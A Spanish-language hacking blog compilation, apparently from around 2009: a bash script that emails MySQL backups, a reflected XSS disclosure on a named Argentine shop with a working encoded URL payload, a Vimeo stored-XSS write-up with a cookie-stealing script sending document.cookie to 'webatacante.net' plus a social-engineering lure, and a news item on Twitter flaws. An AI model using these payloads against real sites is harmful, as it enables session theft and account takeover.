Sistema de backup Cronos por Mail(Ragnarok y demas Mmorpgs)

Como prometi ya hace tiempo, aqui teneis un script bash para hacer backups de modo facil.

[FAQ] Backups de tu base de datos comprimidos por mail

Autor: Jubjub

Código: [Seleccionar]
mysqldump --user=root --password=AQUITIENESQUEPONERTUPASSWORD $1 > ${1}.sql
FECHA=`date +%d-%m`
zip ${FECHA}_${1}_dump.zip ${1}.sql
rm -f *.sql
mutt -s "Backup Servidor ${FECHA}" -a *.zip $2 < mes.txt
rm -f *.zip

1.-Instalacion
Cread un archivo en vuestro dedicado linux, introducid el texto anterior en el, sustituyen la password de root mysql donde indica, dadle permisos con el comando
Citar
chmod 700 nombrearchivo

Una vez hecho esto, cread un archivo llamado mes.txt, y introducid en el el texto que acompañara al backup en vuestro mail.
y estara listo para su uso :D


2.-Forma de uso

Para utilizarlo, teneis que utilizar el comando, estando en la carpeta donde guardasteis el script:
Código: [Seleccionar]
./nombrescript nombrebasededatos email
Y recibireis en vuestro mail el archivo sql de la base de datos comprimido en zip. Podeis automatizarlo para tener backups seghuros que no perdereis en caso de fallo en el dedicado!

Bippie Argentina: XSS Pwned

http://www.rainbowgrabaciones.com.ar/logos-bippie.png

Ante todo gracias a Skeletron, de ElHacker.net, por avisarme de este garrafal fallo




Vamos a revisar uno de los fallos que presenta esta conocida web ;D (si fallan a este nivel, no hay duda de que también tendrán SQLi, dejo la tarea a investigar al que le interese :P )

http://ar.bippie.com/modules/catalog/prodinfo.php?categoria=%3C/title%3E%3Cscript%3Ealert%20%28%22Jugando%20con%20Fosforos%22%29;%3C/script%3E&sub_categoria=rock+nacional&nombre=solotelscompatibles&sbrand=5&smodel=8%2F826#4130952372793495685





Simplisimo!, solo tenemos que escaparnos de la etiqueta <>, y a inyectar html se ha dicho :laugh:

Por esto, es por lo que debeis de recordar siempre, que al mostrar texto que es proporcionado por el cliente, hay que colocar un htmlspecialchars(). :rolleyes:

Un saludo, y hasta la próxima!

PD: He tenido que colocar la url codificada poraque me causaba a mi mismo un XSS :¬¬


XSS + Robo de Cookies en Vimeo

http://www.davedixon.org/file.php/1/vimeo.jpg
Mientras comprobaba esa leyenda urbana de que Vimeo es mejor que Youtube, encontré un XSS, que aunque tiene una cierta dificultad de explotar, puede ser interesante de investigar.

El fallo en cuestión se encuentra en la opción de añadir créditos, que tenemos disponible en cualquier vídeo. No filtra en absoluto html, que podemos introducir sin mas problema. :laugh:

La parte interesante es que esto es una llamada AJAX, que por falta de tiempo no he podido seguir investigando, aunque probablemente lo haré en algún post, mas adelante.

http://i39.tinypic.com/eqwi9u.jpg
Haz click para ver la imagen a tamaño completo


Aquí podemos ver un XSS inofensivo, aunque podría utilizarse para robar las cookies, consiguiendo así privilegios completos, un ejemplo seria este código:

<>document.location="http://webatacante.net/galleta.php?galleta="+document.cookie;< /script >


El código del PHP simplemente guardaría a un archivo de texto plano el contenido de la variable galleta, con lo cual solo nos quedaría robar esas cookies, teniendo acceso completo a la cuenta afectada. ;-)
Aun así, al no haber un método directo (o no descubierto) de hacer esto, como puede ser en los XSS por link, habría que hacer un poco de uso de ingeniería social, quizás en un vídeo dejar el código, prometiendo un premio si se introducen como créditos en el mismo vídeo, añadiendo al final el "código del vídeo", que no seria mas que nuestro XSS. ;D

TwitPwn: Desarrolladores sin vacaciones

http://composta.net/diosameba/wp-content/uploads/2009/04/la-ballena-twitter.jpg
Parece que la fiebre del Twitter les va a dar a algunos dolores de cabeza: Aviv Raff, que ya participo en "El mes de las vulnerabilidades en los navegadores", evento que se llevo a cabo con éxito, ha anunciado en TwitPwn que juli sera el "Mes de las vulnerabilidades Twitter"

Planea lanzar una al dia, la mayoia relacionadas con la API de Twitter, y aplicaciones de terceros. Al menos avisará a los desarrolladores con 24 horas de antelacion, ya que segun el, "las vunerabilidades podrian ser utilizadas para crear un worm-Twitter"

Asi que me temo que los desarolladores afectados van a pasar un mes movidito :rolleyes:

Me entere de esto via SbD